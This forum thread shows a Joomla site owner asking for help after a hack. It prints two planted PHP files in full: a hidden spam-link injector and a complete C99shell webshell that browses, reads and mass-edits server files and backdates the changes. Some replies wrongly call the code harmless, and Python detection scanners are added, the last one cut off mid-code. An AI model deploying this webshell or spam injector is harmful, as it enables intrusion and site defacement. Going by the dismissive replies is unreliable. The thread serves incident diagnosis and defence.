How Owned Is This?


dtp

My server got hacked and I found a bunch of weird files on there; my hosting temporarily suspended the account. I am thinking I used a free Joomla template which had a bad PHP script in it. I could be wrong though, maybe FTP access? Here is the code of the suspicious file..

<?php

$id = isset($_GET['id']) ? intval($_GET['id']) : 0;

if (!file_exists($id)) {
	exit;
}

if (!file_exists($id.'/map.txt')) {
	exit;
}

kodinnt($id.'/map.txt', $id.'/text.txt', mt_rand(1500, 1800));

function kodinnt($f1, $f2, $c = 2000) {
	$hosts = array();
	$map = array();
	$fh = fopen($f1, 'r');
	while (!feof($fh)) {
		$url = fgets($fh);
		if (preg_match('%href="([^"]+)"%', $url, $ret)) {
			$bit = @parse_url($ret[1]);
			if (!$bit || !isset($bit['host'])) continue;
			$hosts[$bit['host']] = 1;
		}
	}
	rewind($fh);
	$host = array_rand($hosts);
	while (!feof($fh)) {
		$url = fgets($fh);
		if (strpos($url, $host)) {
			$map[] = trim($url);
		}
	}
	fclose($fh);
	$ftext = file_exists($f2);
	if ($ftext) {$word = file_get_contents($f2);$rw = str_word_count($word, 1);}
	$c  = min(sizeof($map),$c);
	$rm = array_rand($map, $c);
	if (!is_array($rm)) {
		$rm = array(1);
	}
	$id = genID();
	$view  = '';
	//$view  = '<script language="javascript">document.write("<style>#'.$id.'{height: 830px; overflow: hidden; position:absolute; top:-869px; left:-1016px;}</style>");</script>';
	$view='<marquee style="position:absolute;width:0px">';
	foreach ($rm as $i) {
		$p1 = '';$p2='';
		if ($ftext) {
		$per=array_rand($rw, mt_rand(1,4));if(!is_array($per))$per=array($per);
		$pos=array_rand($rw, mt_rand(1,4));if(!is_array($pos))$pos=array($pos);
		foreach($per as $pu) {$p1 .= trim($rw[$pu]).' ';}
		foreach($pos as $pu) {$p2 .= trim($rw[$pu]).' ';}}
		$link = trim($map[$i]);
		$link = preg_replace_callback('%\{(.*?)\}%i', create_function('$r','$a=explode(\'|\',$r[1]);return $a[array_rand($a)];'), $link);
		$view.= $p1.$link.$p2."\r\n";
	}
	$view.='</marquee>';
	echo($view);
}

function genID() {
	$id   = '';
	$word = array('q','w','e','r','t','y','u','i','o','p','a','s','d','f','g','h','j','k','l','z','x','c','v','b','n','m');
	$num  = array(0,1,2,3,4,5,6,7,8,9);
	$count = mt_rand(4, 7);
	for ($i = 0; $i < $count; $i++) {
		if ($i == 0) {
			$id .= $word[array_rand($word)];
		} else {
			$ps = mt_rand(1,2);
			if ($ps == 1) {
				$id .= $word[array_rand($word)];
			} else {
				$id .= $num[array_rand($num)];
			}
		}
	}
	return $id;
}


?>

wtf

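What the script above emits, once its map.txt is in place, is a block of links wrapped in a zero-width marquee: invisible to a visitor but present in the HTML that search engines index (the commented-out variant positions the block off-screen instead). The following Python is an added example, not part of the original post or of the script; it scans a page's HTML for anchors nested inside containers hidden by inline style and lists the external hosts they point at, which is the quickest way to confirm what a suspected doorway page is actually serving. The sample page and the hostnames in it are constructed for the example.

```python
"""Find link injection hidden from visitors but visible to crawlers (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline-style fragments that make a container invisible to a human visitor.
# Each rule is (name, regex); the first match names the hiding technique.
HIDING_RULES = (
    ("zero-width", re.compile(r"width\s*:\s*0(px)?\s*(;|$)")),
    ("zero-height", re.compile(r"height\s*:\s*0(px)?\s*(;|$)")),
    ("display-none", re.compile(r"display\s*:\s*none")),
    ("visibility-hidden", re.compile(r"visibility\s*:\s*hidden")),
    ("offscreen", re.compile(r"(top|left)\s*:\s*-\d{3,}px")),
)


def hiding_reason(style):
    """Return the name of the first hiding rule matching an inline style, or None."""
    style = (style or "").lower()
    for name, rule in HIDING_RULES:
        if rule.search(style):
            return name
    return None


class HiddenLinkFinder(HTMLParser):
    """Keep a stack of open elements and report anchors nested inside a hidden one."""

    VOID = ("br", "img", "input", "meta", "link", "hr")

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.stack = []      # (tag, hiding reason or None) per open element
        self.findings = []   # (external host, reason, href)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        reason = hiding_reason(attrs.get("style"))
        if tag == "a" and attrs.get("href"):
            enclosing = next((r for _, r in reversed(self.stack) if r), None)
            host = (urlparse(attrs["href"]).hostname or "").lower()
            if enclosing and host and host != self.site_host:
                self.findings.append((host, enclosing, attrs["href"]))
        if tag not in self.VOID:          # void elements never get a close tag
            self.stack.append((tag, reason))

    def handle_endtag(self, tag):
        # pop back to the matching open tag, tolerating sloppy markup
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break


def find_hidden_links(html, site_host):
    """All (host, reason, href) triples for external links inside hidden containers."""
    parser = HiddenLinkFinder(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings


def external_hosts(html, site_host):
    """Sorted, de-duplicated hosts worth looking up after a compromise."""
    return sorted({host for host, _, _ in find_hidden_links(html, site_host)})


# Constructed sample: one visible page with the marquee trick and the off-screen trick.
SAMPLE_PAGE = """<html><body>
<p>Welcome, see <a href="http://www.example.com/about">about us</a>.</p>
<marquee style="position:absolute;width:0px">
cheap <a href="http://spam-one.invalid/buy">pills</a> now
<a href="http://spam-two.invalid/offer">offer</a> here
</marquee>
<div style="position:absolute;top:-869px;left:-1016px;height:830px;overflow:hidden">
<a href="http://spam-three.invalid/">casino</a></div>
<a href="http://www.example.com/contact">contact</a>
</body></html>"""

if __name__ == "__main__":
    for host, reason, href in find_hidden_links(SAMPLE_PAGE, "www.example.com"):
        print(f"{host:20} hidden by {reason:18} {href}")
```

Run it against a saved copy of the page Google sees (fetch with a search-engine User-Agent, since doorway scripts often serve different content to crawlers) rather than against what your browser shows.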

After going through the code, it looks like it's scanning the network for hosts and then writing whatever it finds to some text files.

kodinnt($id.'/map.txt', $id.'/text.txt', mt_rand(1500, 1800));

The piece of code below simply displays the contents of the files in your browser.

$id = genID();
        $view  = '';
        //$view  = '<script language="javascript">document.write("<style>#'.$id.'{height: 830px; overflow: hidden; position:absolute; top:-869px; left:-1016px;}</style>");</script>';
        $view='<marquee style="position:absolute;width:0px">';
        foreach ($rm as $i) {
                $p1 = '';$p2='';
                if ($ftext) {
                $per=array_rand($rw, mt_rand(1,4));if(!is_array($per))$per=array($per);
                $pos=array_rand($rw, mt_rand(1,4));if(!is_array($pos))$pos=array($pos);
                foreach($per as $pu) {$p1 .= trim($rw[$pu]).' ';}
                foreach($pos as $pu) {$p2 .= trim($rw[$pu]).' ';}}
                $link = trim($map[$i]);
                $link = preg_replace_callback('%\{(.*?)\}%i', create_function('$r','$a=explode(\'|\',$r[1]);return $a[array_rand($a)];'), $link);
                $view.= $p1.$link.$p2."\r\n";
        }
        $view.='</marquee>';
        echo($view);

I don't see any danger in the code, but I think the person who hacked into your server was really trying to scare you and alert you to the vulnerability that exists within your web application. You will need to investigate, or get your hosting company to determine whether there is a configuration issue or a vulnerability in general with your web server.

Edited by Infiltrator

That code itself looks benign, but I would need to see what is in map.txt and text.txt. It looks more like an HTML MARQUEE scroller taking info from a form, and it might be showing links to bad sites, but I can't tell what it's doing without the other scripts. It looks like it's part of a form; the part that posts against this particular file is in another script and reads in data to throw up in the marquee.

If you did get hacked, I would move to another host though, and avoid using Joomla at all costs. Seriously, Joomla is like the Swiss cheese of CMS software: more holes than you can count. If you still have the theme files you believe to be hacked, hold on to them and go through all of the files; see if there is any reference to external sites, URLs, etc. that might be the attacker's sites, then you can track it down. In most cases the files, while possibly vulnerable, should be able to be thwarted if the host's servers are secured, since most hacks are either SQL injection or RFI attacks, and much of this can be avoided; but if the scripts allowed any system execution, it's game over. Joomla in itself, regardless of theme used, tends to be very hackable, and just about every version that has come out has been vulnerable to attack.

http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=joomla&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=


Basically that's what the whole file looks like, but it's bigger. I also found a map.php:

<?php


/*
* @author: 
* @icq:    
* @site:   http://forum.antichat.ru/
*
*/
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);

$win = strtolower(substr(PHP_OS,0,3)) == "win";
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
$shver = "4.0";
if (empty($surl)){
	$surl = $_SERVER['PHP_SELF'];
}
$surl = htmlspecialchars($surl);

$curdir = "./";
$tmpdir = "";
$tmpdir_log = "./";

$sort_default = "0a";
$sort_save = TRUE;


$safemode_diskettes = array('a');
$hexdump_lines = 8;
$hexdump_rows = 24;
$nixpwdperpage = 100;



extract($_POST);


if (isset($_POST['act'])) $act  = $_POST['act'];
if (isset($_POST['f'])) $f    = urldecode($_POST['f']);
if (isset($_POST['d'])) $d    = urldecode($_POST['d']); else $d=getcwd();


$lastdir = realpath(".");
chdir($curdir);


function recursFile($dir) {
	$files = array();
	if (substr($dir, -1) != DIRECTORY_SEPARATOR) {
		$dir .= DIRECTORY_SEPARATOR;
	}
	$handle = @opendir($dir);
	if ($handle === false) {
		return false;
	}
	while (($file = readdir($handle)) !== FALSE) {
		if ($file != '.' && $file != '..') {
			if (is_dir($dir.$file.DIRECTORY_SEPARATOR)) {
				$temp = recursFile($dir.$file);
				if ($temp !== false) {
					$files = array_merge($files, $temp);
				}
			} else {
				$files[] = $dir.$file;
			}
		}
	}
	closedir($handle);
	return $files;
}

function tabsort($a,$B) 
{
	global $v; 
	return strnatcmp($a[$v], $b[$v]);
}
function save_file($file, $content) {
	global $win;
	if(!file_exists($file)) {
		return false;
	}
	clearstatcache();
	$filetime = filemtime($file);
	if(!is_writable($file)) {
		$fileperm = substr(decoct(fileperms($file)), -4, 4);
		@chmod($file, intval(0777,8));
		if(!is_writable($file)) {
			return false;
		}
	}
	$handle = @fopen($file, 'w');
	if($handle === FALSE) {
		return false;
	}
	fwrite($handle, $content);
	fclose($handle);
	@touch($file, $filetime, $filetime);
	if(isset($fileperm) && !empty($fileperm)) {
		@chmod($file, intval($fileperm,8));
	}
	clearstatcache();
	return true;
}

if (!function_exists("stripos")) {
  function stripos($str,$needle) {
   return strpos(strtolower($str),strtolower($needle));
  }
}
function view_perms($mode)
{
 if (($mode & 0xC000) === 0xC000) {$type = "s";}
 elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
 elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
 elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
 elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
 elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
 elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
 else {$type = "?";}

 $owner["read"] = ($mode & 00400)?"r":"-";
 $owner["write"] = ($mode & 00200)?"w":"-";
 $owner["execute"] = ($mode & 00100)?"x":"-";
 $group["read"] = ($mode & 00040)?"r":"-";
 $group["write"] = ($mode & 00020)?"w":"-";
 $group["execute"] = ($mode & 00010)?"x":"-";
 $world["read"] = ($mode & 00004)?"r":"-";
 $world["write"] = ($mode & 00002)? "w":"-";
 $world["execute"] = ($mode & 00001)?"x":"-";

 if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
 if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
 if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}

 return $type.join("",$owner).join("",$group).join("",$world);
}
function parsesort($sort)
{
 $one = intval($sort);
 $second = substr($sort,-1);
 if ($second != "d") {$second = "a";}
 return array($one,$second);
}
if (!function_exists("parse_perms"))
{
function parse_perms($mode)
{
 if (($mode & 0xC000) === 0xC000) {$t = "s";}
 elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
 elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
 elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
 elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
 elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
 elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
 else {$t = "?";}
 $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
 $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
 $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
 return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
}
}
if(!function_exists('str_ireplace')){
  function str_ireplace($search,$replace,$subject){
    $token = chr(1);
    $haystack = strtolower($subject);
    $needle = strtolower($search);
    while (($pos=strpos($haystack,$needle))!==FALSE){
      $subject = substr_replace($subject,$token,$pos,strlen($search));
      $haystack = substr_replace($haystack,$token,$pos,strlen($search));
    }
    $subject = str_replace($token,$replace,$subject);
    return $subject;
  }
}

function str2mini($content,$len)
{
 if (strlen($content) > $len)
 {
  $len = ceil($len/2) - 2;
  return substr($content, 0,$len)."...".substr($content,-$len);
 }
 else {return $content;}
}
function view_perms_color($o)
{
 if (!@is_readable($o)) {return "<font color=red>".view_perms(@fileperms($o))."</font>";}
 elseif (!@is_writable($o)) {return "<font color=white>".view_perms(@fileperms($o))."</font>";}
 else {return "<font color=green>".view_perms(@fileperms($o))."</font>";}
}



function no_antivir_search($d)
{
 global $found;
 global $found_d;
 global $found_f;
 global $search_i_f;
 global $search_i_d;
 global $a;
 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 $h = opendir($d);
 while (($f = readdir($h)) !== FALSE)
 {
  if($f != "." && $f != "..")
  {
   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
   if (is_dir($d.$f))
   {
    $search_i_d++;
    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
    if (!is_link($d.$f)) {no_antivir_search($d.$f);}
   }
   else
   {
    $search_i_f++;
    if ($bool)
    {
     if (!empty($a["text"]))
     {
      $r = @file_get_contents($d.$f);
      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
      else {$bool = strpos(" ".$r,$a["text"],1);}
      if ($a["text_not"]) {$bool = !$bool;}
      if ($bool) {$found[] = $d.$f; $found_f++;}
     }
     else {$found[] = $d.$f; $found_f++;}
    }
   }
  }
 }
 closedir($h);
}
if(!isset($act)) {$act='';}
if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}

header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", FALSE);
header("Pragma: no-cache");
if (empty($tmpdir))
{
 $tmpdir = ini_get("upload_tmp_dir");
 if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
}
$tmpdir = realpath($tmpdir);
$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
else {$tmpdir_logs = realpath($tmpdir_logs);}
$ud = urlencode($d);
?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title>C99shell k1b0rg Edition (REPLACER)</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid 
#666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>

<form name='todo' method='POST'>
<input name='act' type='hidden' value=''>
<input name='d' type='hidden' value=''>
<input name='f' type='hidden' value=''>
</form><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><font face="Verdana" size="5"><b>C99ReplaceR</b> k1b0rg Edition</font><font face=Webdings size=6><b>!</b></font></p></center></th></tr>
<tr><td>
<p align="left"><?php
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$d = str_replace("\\\\","\\",$d);
$dispd = htmlspecialchars($d);
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
$i = 0;
foreach($pd as $B)
{
 $t = "";
 $j = 0;
 foreach ($e as $r)
 {
  $t.= $r.DIRECTORY_SEPARATOR;
  if ($j == $i) {break;}
  $j++;
 }
 echo "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($t)."';document.todo.submit();\"><b>".htmlspecialchars($B).DIRECTORY_SEPARATOR."</b></a>";
 $i++;
}
echo "   ";
if (@is_writable($d))
{
 $wd = TRUE;
 $wdt = "<font color=green>[ ok ]</font>";
 echo "<b><font color=green>".view_perms(@fileperms($d))."</font></b>";
}
else
{
 $wd = FALSE;
 $wdt = "<font color=red>[ Read-Only ]</font>";
 echo "<b>".view_perms_color($d)."</b>";
}
echo "<br>";
$letters = "";
if ($win)
{
 $v = explode("\\",$d);
 $v = $v[0];
 foreach (range("a","z") as $letter)
 {
  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
  if (!$bool) {$bool = is_dir($letter.":\\");}
  if ($bool)
  {
   $letters .= "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($letter.":\\")."';document.todo.submit();\">[ ";
   if (strtolower($letter.':') != strtolower($v)) {$letters .= $letter;}
   else {$letters .= "<font color=\"#00FF66\">".$letter."</font>";}
   $letters .= " ]</a> ";
  }
 }
 if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
}

echo "</p></td></tr></table><br>";
if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
if ($act == "") {$act = "ls";}



if($act == 'replace') {
	if(!empty($found_text)) {
		if($recurs == 2) {
			$files = array();
			$dir = opendir($d);
			while (($file = readdir($dir)) !== FALSE) {
				if(is_file($d.$file)) {
					$files[] = $d.$file;
				}
			}
			closedir($dir);
		} else {
			$files = recursFile($d);
		}
		if(strpos($ext, '*') === false) {
			$ext = array_map('trim', explode(',', $ext));
			foreach($files as $key=>$file) {
				if(strpos($file, '.') !== false) {
					$temp = explode('.', $file);
					if(!in_array($temp[count($temp)-1], $ext)) {
						unset($files[$key]);
					}
				} else {
					unset($files[$key]);
				}
			}
		}
		$result = array();
		$count = 0;
		foreach($files as $file) {
			$result[$count]['file'] = $file;
			$content = @file_get_contents($file);
			if(!$content) {
				$result[$count]['status'] = '<font color=red>ERROR: File not read</font>';
				++$count;
				continue;
			}
			if(stripos($content, $found_text) !== false || isset($regular)) {
				if(isset($regular)) {
					$content = preg_replace('%'.$found_text.'%i', $replace_text, $content);
				} else {
					if(isset($register)) {
						$content = str_ireplace($found_text, $replace_text, $content);
					} else {
						$content = str_replace($found_text, $replace_text, $content);
					}
				}
			} else {
				if (!isset($view_none)) {
					$result[$count]['status'] = '<font color=red>ERROR: Match not found in file</font>';
					++$count;
				}
				continue;
			}
			if(save_file($file, $content)) {
				$result[$count]['status'] = '<font color=green>REPLACE: OK</font>';
			} else {
				$result[$count]['status'] = '<font color=red>ERROR: Content not saved in file</font>';
			}
			++$count;
		}
		for($i = 0; $i < sizeof($result); ++$i) {
			echo('<p><a href="#" onclick="document.todo.act.value=\'view\';document.todo.f.value=\''.urlencode($result[$i]['file']).'\';document.todo.submit();">'.$result[$i]['file'].'</a> => '.$result[$i]['status'].'</p>');
		}
	} else {
		$act = 'ls';
	}
}

if ($act == "view") {
	echo(file_get_contents($f));
}
if ($act == "ls")
{
  $list = array();
  if ($h = @opendir($d))
  {
   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
   closedir($h);
  }
	if (count($list) == 0) {
		echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";
	} elseif (sizeof($list) > 500) {
		echo '<center><b>Too many files ('.sizeof($list).')!</b></center>';
	} else {
  //Building array
  $objects = array();
  $vd = "f"; //Viewing mode
  if ($vd == "f")
  {
   $objects["head"] = array();
   $objects["folders"] = array();
   $objects["links"] = array();
   $objects["files"] = array();
   foreach ($list as $v)
   {
    $o = @basename($v);
    $row = array();
    if ($o == ".") {$row[] = $d.$o; }
    elseif ($o == "..") {$row[] = $d.$o; }
    elseif (is_dir($v))
    {
     if (@is_link($v)) {}
     else {}
     $row[] = $v;
    }
    elseif(@is_file($v)) {$row[] = $v; }

    $row[] = @fileperms($v);
    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
    elseif (@is_link($v)) {$objects["links"][] = $row;}
    elseif (@is_dir($v)) {$objects["folders"][] = $row;}
    elseif (@is_file($v)) {$objects["files"][] = $row;}
    $i++;
   }
   $row = array();
   $row[] = "<b>Name</b>";
   $row[] = "<b>Perms</b>";
   $row['event'] = '';
   $sort = 'a';
   $parsesort = parsesort($sort);

   $v = $parsesort[0];
   usort($objects["folders"], "tabsort");
   usort($objects["links"], "tabsort");
   usort($objects["files"], "tabsort");
   if ($parsesort[1] == "d")
   {
    $objects["folders"] = array_reverse($objects["folders"]);
    $objects["files"] = array_reverse($objects["files"]);
   }
   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
   $tab = array();
   $tab["cols"] = array($row);
   $tab["head"] = array();
   $tab["folders"] = array();
   $tab["links"] = array();
   $tab["files"] = array();
   $i = 0;
   foreach ($objects as $a)
   {
    $v = $a[0];
    $o = basename($v);
    $dir = dirname($v);
    if (isset($disp_fullpath)) {$disppath = $v;}
    else {$disppath = $o;}
    $disppath = str2mini($disppath,60);

    $uo = urlencode($o);
    $ud = urlencode($dir);
    $uv = urlencode($v);
    $row = array();
    if ($o == "." || $o == "..") {
	 $row['event'] = 'onclick="document.todo.act.value=\'ls\';document.todo.d.value=\''.urlencode(realpath($d.$o)).'\';document.todo.submit();"';
     $row[] = $o;
    } else {
		if (is_link($v)){
			$disppath .= " => ".readlink($v);
		} elseif (is_dir($v)) {
			$row['event'] = 'onclick="document.todo.act.value=\'ls\';document.todo.d.value=\''.$uv.'\';document.todo.submit();"';
			$row[] =  " [".$disppath."]";
		} else {
			$row['event'] = '';
			$row[] =  " ".$disppath;
		}
	}

     $row[] =  "<b>".view_perms_color($v)."</b>";
    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
    elseif (@is_link($v)) {$tab["links"][] = $row;}
    elseif (@is_dir($v)) {$tab["folders"][] = $row;}
	elseif (@is_file($v)) {$tab["files"][] = $row;}
    $i++;
   }
  }
  //Compiling table
  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0>";
  foreach($table as $row)
  {
   echo "<tr onMouseOver=\"this.style.background='black'\" onMouseOut=\"this.style.background='#333333'\" ".$row['event'].">\r\n";
   unset($row['event']);
   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
   echo "</tr>\r\n";
  }
  echo "</table><hr size=\"1\" noshade><p align=\"right\">";
 }
}



?>
</td></tr></table><a bookmark="minipanel"><br>
<form method="POST">
<input type=hidden name=act value="replace">
<input type=hidden name="d" value="<?php echo $dispd; ?>">
<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: RePlAcE::</b></p></td></tr>
<tr><td width="50%" height="1" valign="top">

<br />
<center>
<table>
	<tr>
		<td>:: File Extension (* - any file) ::</td>
		<td><input type="text" name="ext" size="50" value="php,phtml,html"></td>
	</tr>
	<tr>
		<td>:: Использовать рекурсию ::</td>
		<td><label><input type="radio" name="recurs" value="1" checked> Да </label><label><input type="radio" name="recurs" value="2"> Нет</label></td>
	</tr>
	<tr>
		<td>:: Регистронезависимый поиск ::</td>
		<td><input type="checkbox" name="register" size="50" value="1"></td>
	</tr>
	<tr>
		<td>:: Использовать регулярки для поиска ::</td>
		<td><input type="checkbox" name="regular" size="50" value="1"></td>
	</tr>
	<tr>
		<td>:: Выводить файлы без совпадений ::</td>
		<td><input type="checkbox" name="view_none" size="50" value="1"></td>
	</tr>
</table>
</center>


</td>


<td width="50%" height="1" valign="top">
<center>
<b>:: Текст для поиска ::</b> <br ><textarea name="found_text"    cols=136 rows=5></textarea> <br />
<b>:: Текст для замены ::</b> <br /><textarea name="replace_text" cols=136 rows=5></textarea>

</center></td></tr>
<tr><td width="100%" height="1" valign="top" colspan="2"><center><input type="submit" value="Мне повезёт!!!" style="width:100%"></center></td></tr></TABLE>
</form>

</body></html><?php chdir($lastdir); ?>

hummm..

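A triage scanner for this situation, added here as an example and not taken from the thread or from the shell's authors. It walks a web root and scores PHP files against the constructs visible in the posted map.php: extract() of $_POST, the $$k = $v variable-variable loop, create_function, the C99 title string, and the save_file() trick of re-applying the original mtime with touch(). Because that touch() call backdates the modification time, the scanner also compares mtime with the inode change time, which touch() cannot rewrite; a large gap is a strong hint that a file was planted and backdated. It also lists the external hosts referenced by each flagged file, which is what the earlier reply's advice to look for references to the attacker's sites amounts to. The sample web root, file names, indicator weights and the 4-point threshold are assumptions made for this example.

```python
"""Triage a web root for PHP webshell indicators (added example, not from the thread)."""
import os
import re
import tempfile
import time

SITE_HOST = "www.example.com"  # assumed: the victim's own host, excluded from external refs

# Constructs seen in the posted map.php, each with a weight for a crude score.
# Legitimate application code rarely combines several of these in one file.
INDICATORS = [
    (r"\bextract\s*\(\s*\$_(POST|GET|REQUEST)", 3, "extract() of request data"),
    (r"\$\$\w+\s*=\s*\$v", 3, "variable-variable assignment from request"),
    (r"\bcreate_function\s*\(", 2, "create_function (runtime code eval)"),
    (r"\b(eval|passthru|shell_exec|system|popen|proc_open)\s*\(", 2, "code or command execution"),
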